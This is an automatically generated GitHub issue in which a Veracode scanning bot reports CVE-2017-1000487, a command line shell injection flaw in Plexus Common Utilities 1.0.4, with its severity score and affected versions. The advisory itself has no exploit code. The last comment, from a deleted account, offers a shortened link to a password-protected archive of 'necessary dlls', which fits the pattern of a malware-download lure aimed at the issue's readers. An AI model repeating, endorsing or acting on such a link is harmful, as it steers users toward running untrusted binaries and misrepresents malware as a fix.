CVE: 2017-1000487 found in Plexus Common Utilities - Version: 1.0.4 [JAVA]

[github-actions[bot]]

Veracode Software Composition Analysis

Attribute	Details
Library	Plexus Common Utilities
Description	A collection of various utility classes to ease working with strings, files, command lines and more.
Language	JAVA
Vulnerability	Command Line Shell Injection
Vulnerability description	plexus-utils is vulnerable to command line shell injection. The library does not correctly quote the contents of double-quoted strings, allowing a malicious user to inject and execute arbitrary shell code.
CVE	2017-1000487
CVSS score	7.5
Vulnerability present in version/s	1.0.4-1.5
Found library version/s	1.0.4
Vulnerability fixed in version	null
Library latest version	4.0.1
Fix	null

Links:

• https://sca.analysiscenter.veracode.com/vulnerability-database/libraries/930?version=1.0.4
• https://sca.analysiscenter.veracode.com/vulnerability-database/vulnerabilities/3933
• Patch: null

[ghost]

try this https://bit.ly/3TC7hrw

Password: changeme I put the necessary dlls in the archive